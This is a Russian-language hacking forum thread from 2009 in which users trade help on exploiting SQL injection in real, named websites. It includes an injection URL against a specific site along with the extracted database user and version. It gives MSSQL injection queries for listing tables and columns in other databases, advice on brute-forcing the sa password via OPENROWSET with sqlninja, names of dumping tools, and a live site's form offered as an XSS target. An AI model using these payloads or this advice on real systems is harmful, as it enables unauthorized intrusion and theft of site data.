 |
|
18.10.2009, 00:49
|
|
Познающий
Регистрация: 21.01.2009
Сообщений: 98
С нами:
9107354
Репутация:
122
|
|
Сообщение от mailbrush
Т.е. ты достаешь данные из таблички пользователей сайта. А путь ты нашёл не к админке сайта, а к phpmyadmin'у и directadmin'y, соответственно пароль не подходит. Авторизация, как было сказано выше, на главной странице. Авторизируйся под логином и паролем admin.
да эт ясно, не дурак...вопрос в том как достать данные для админки
|
|
|
18.10.2009, 04:36
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Сообщение от jecka3000
у меня следующий вопрос. Есть скуля, версия БД =4. Там нет informatio_shcema. Следовательно поиск имен таблиц и т.д. превращается в полный геморр(лично для меня это так)). Можно ли автоматизировать этот процесс? Кроме использования сипта?
https://forum.antichat.ru/thread148915.html
|
|
|
|
18.10.2009, 12:17
|
|
Постоянный
Регистрация: 07.03.2009
Сообщений: 357
С нами:
9042754
Репутация:
399
|
|
Набрёл тут на недописанную страничку на одном сайте, но никак немогу раскрутить ничего кроме версии...
что можно ещё сделать?
Код:
http://www.forema.ru/test.php?id=26+and+substring(version(),1,1)=5
|
|
|
|
18.10.2009, 12:29
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Сообщение от Gray_Wolf
Набрёл тут на недописанную страничку на одном сайте, но никак немогу раскрутить ничего кроме версии...
что можно ещё сделать?
Код:
http://www.forema.ru/test.php?id=26+and+substring(version(),1,1)=5
Например,
Код:
kuhni@zvm12:kuhni:5.0.77
Юзер:бд:версия
|
|
|
|
18.10.2009, 13:24
|
|
Новичок
Регистрация: 29.09.2009
Сообщений: 5
С нами:
8745043
Репутация:
0
|
|
Заюзал скулю. Движок самописный, админку не нашел. Прав на исполнение команд не хватает. Вручную перебирать все через top 1 - ну очень долго и геморно, поэтому имею пару вопрос.
1. Друзья, что можно сделать с mssql скулей, пользователь не sa. Может ли хватить прав для заливки файла в директорию или сайта или на это тоже не хватит прав(простите, не знаю...)
2. Подскажите нормальный дампер через скул для mssql, все что нашел - либо удалено, либо бито...
Когда перебирал базы(select db_name(n)) наткнулся на очень вкусные вещи, но когда пытался получить название их колонок, меня просто перекидало на изначальную страницу(дефолтную, где заюзал скул), а скуля просто отображалась в строке поиска. Может ли это говорить о том, что не хватает прав?
Просто у меня возникла такая идея: Если у моего пользователя хватит прав, то можно посмотреть и эту таблицу, но, из-за того что текущая база данных другая, то через INFORMATION_SCHEMA подобрать таблицы и поля - не удастся. Прав или натупил?
3. Можно ли попробовать подключиться к этой базе используя запрос вида(приблизительно)
select top 1 (имя колонки) from (имя таблицы) where db_name('имя базы')--
Или в ms sql с эти строго и ничего не получится? Если возможно, но запрос другой - подкорректируйте пожалуйста, я только учусь))) |
|
|
|
18.10.2009, 14:09
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
С нами:
10109126
Репутация:
1980
|
|
1. Друзья, что можно сделать с mssql скулей, пользователь не sa. Может ли хватить прав для заливки файла в директорию или сайта или на это тоже не хватит прав(простите, не знаю...)
Добиться повышения привилегий с использованием брута пароля sa через OPENROWSET (в MSSQL 2005 отключено по умолчанию). В этом поможет инструмент sqlninja.
2. Подскажите нормальный дампер через скул для mssql, все что нашел - либо удалено, либо бито...
Pangolin, PRIAMOS, SFX-SQLi
Когда перебирал базы(select db_name(n)) наткнулся на очень вкусные вещи, но когда пытался получить название их колонок, меня просто перекидало на изначальную страницу(дефолтную, где заюзал скул)
возможно ты использовал неправильный синтаксис при указании базы данных, должно быть:
SELECT * FROM [db]..[table]
Если у моего пользователя хватит прав, то можно посмотреть и эту таблицу, но, из-за того что текущая база данных другая, то через INFORMATION_SCHEMA подобрать таблицы и поля - не удастся.
Можно получить названия таблиц из других баз данных, используя оператор USE для их выбора (если конечно прав хватит):
;USE db; SELECT name FROM sysobjects WHERE xtype = 'U';
;USE db; SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'users')
|
|
|
|
18.10.2009, 14:32
|
|
Постоянный
Регистрация: 07.03.2009
Сообщений: 357
С нами:
9042754
Репутация:
399
|
|
Сообщение от mailbrush
Например,
Код:
kuhni@zvm12:kuhni:5.0.77
Юзер:бд:версия Както негусто...
Может ещё что-то можно вытянуть?
|
|
|
|
18.10.2009, 14:34
|
|
Новичок
Регистрация: 15.10.2009
Сообщений: 5
С нами:
8722839
Репутация:
0
|
|
http://justparty.ru/p.mailing/
Вписываем в поля "Имя", "Фамилия"
Что с этим можно сделать? |
|
|
|
18.10.2009, 14:57
|
|
Постоянный
Регистрация: 09.07.2006
Сообщений: 553
С нами:
10441826
Репутация:
1861
|
|
2zyat
почитайте статьи про XSS
|
|
|
|
18.10.2009, 17:25
|
|
Новичок
Регистрация: 29.09.2009
Сообщений: 5
С нами:
8745043
Репутация:
0
|
|
Сообщение от [Raz0r]
Добиться повышения привилегий с использованием брута пароля sa через OPENROWSET (в MSSQL 2005 отключено по умолчанию). В этом поможет инструмент sqlninja.
Pangolin, PRIAMOS, SFX-SQLi
возможно ты использовал неправильный синтаксис при указании базы данных, должно быть:
SELECT * FROM [db]..[table]
Можно получить названия таблиц из других баз данных, используя оператор USE для их выбора (если конечно прав хватит):
;USE db; SELECT name FROM sysobjects WHERE xtype = 'U';
;USE db; SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'users')
Огромное спасибо!
Все прокатило, только использовал без use а через:
database..sysobjects
database..syscolumns
Сейчас стала проблема в том, что не перебираются колонки.
SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'users')
Я дописал
SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'users') AND name IN NOT ('userid')
В ответ получаю:
Incorrect syntax near the keyword 'NOT'
userid - первая колонка в таблице users
Так-же не получилось вывести данные даже с этого поля userid
Запрос имел вид:
SELECT TOP 1 userid from [database]..[users]
Ответ
Operand type clash: uniqueidentifier is incompatible with tinyint
Если убрать кавычки то ответ меняется на:
Incorrect syntax near 'users'
Попробовал загнать "users" в char - не получилось.
просто для меня это загадка, которую ну никак не получается отгадать....Единственное что все-таки приходит в голову, это - не хватает прав. Хотя, если хватило на чтение database..sysobjects и database..syscolumns, то должно хватить прав и database.users...
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Raz0r]](/avatars/avatar33548.jpg?1606588){kind=avatar}
Похожие темы
Линейный вид
